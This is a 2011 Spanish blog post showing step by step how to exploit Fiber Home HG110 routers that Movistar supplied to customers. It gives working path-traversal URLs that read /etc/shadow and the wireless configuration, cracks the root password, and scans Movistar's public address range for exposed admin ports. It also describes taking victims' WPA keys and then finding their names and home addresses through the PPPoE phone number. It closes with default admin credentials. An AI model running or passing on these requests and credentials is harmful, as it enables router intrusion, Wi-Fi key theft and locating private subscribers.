martes, 2 de agosto de 2011

Movistar entrega routers con falla de seguridad a sus clientes. Fiber Home HG 110

Hace poco recibimos un router por parte de Movistar de marca Fiber Home Modelo HG110. No hizo falta mucha búsqueda en internet para saber lo vulnerable que era. Ver las claves WPA o WPA2 en texto plano y mucha otra información interesante.



 Aquí les mostraremos una de las grandes deficiencias de seguridad en este modelo y que Movistar entrega a sus clientes en forma masiva.

1.- Ya que estamos conectados en forma local, veamos que puertos tiene abiertos



Puertos abiertos: 22 y 8000 para administración

2.- Veamos que nos muestra el puerto 8000



Por lo pronto no poseemos las credenciales para ingresar, pero sabemos que es la interfaz de configuracion

3.- LFI y Directory Path Traversal: con esta vulnerabilidad podemos entrar a la interfaz de administración sin necesidad de las credenciales ademas de conseguir el archivo "shadow" que se encuentra en el router.


http://192.168.1.1:8000/cgi-bin/webproc?getpage=../../../../../../../../../../../../etc/shadow&var:menu=advanced&var:page=dns

4. Excelente, ahora copiamos el archivo en un txt y usamos Jhon the Ripper para obtener la clave de root.


No era muy dificil, era user "root" y pass "root"  :P

5.- Ahora nos conectamos localmente por ssh al router y comenzamos a navegar por las carpetas buscando archivos interesantes, como los archivos de configuración, donde nos encontramos con la clave WPA en texto plano ademas del nombre de la red y mucha información interesante.


http://192.168.1.1:80


6.- WOW!! Tenemos la clave WPA en texto plano, muy bien, todo esto ha sido en forma local, pero servira a traves de internet??  Hagamos un pequeño scan para ver si podemos ver el puerto 22 abierto en el segmento de Movistar



7.- Vemos que esta filtrado, veamos el puerto 8000



8.- Excelente, están abiertos, como sabemos, es posible acceder a la configuración del router sin necesidad de credenciales



http://192.168.1.1:8000/cgi-bin/webproc?getpage=html/index.html&var:menu=setup&var:page=wireless&var:subpage=wlbasic

9.- Ya estamos adentro, ahora recopilaremos la informacion de la red y veremos que tipo de seguridad tiene la red inalambrica



Tiene WPA pero obviamente aparece en asteriscos ***********************

10.-  Veamos si la podemos obtener a travez dela url y ademas en texto plano



http://201.246.x.x:8000/cgi-bin/webproc?getpage=../../../../../../../../../../../../var/config/wlan0.conf&var:menu=advanced&var:page=dns


11.- WOW!!Genial, tenemos la clave WPA y el SSID,  pero donde estará esta red??  Bueno, solo tenemos que revisar la configuración PPPoE y ver el numero de teléfono asignado



12.- Luego buscar el telefono en alguna pagina como, amarillas.cl o a veces aparecen en mapcity.cl, nos dira a quien pertenece, direccion y su ubicacion en el mapa  :D



Como ven, su privacidad depende de la seguridad de sus proveedores, espero que les haya parecido interesante.


 @_mshinc_


PD: Algunos user antiguos para el puerto 8000

usuario:password 
telefonica user:user
User:M0V15tar$$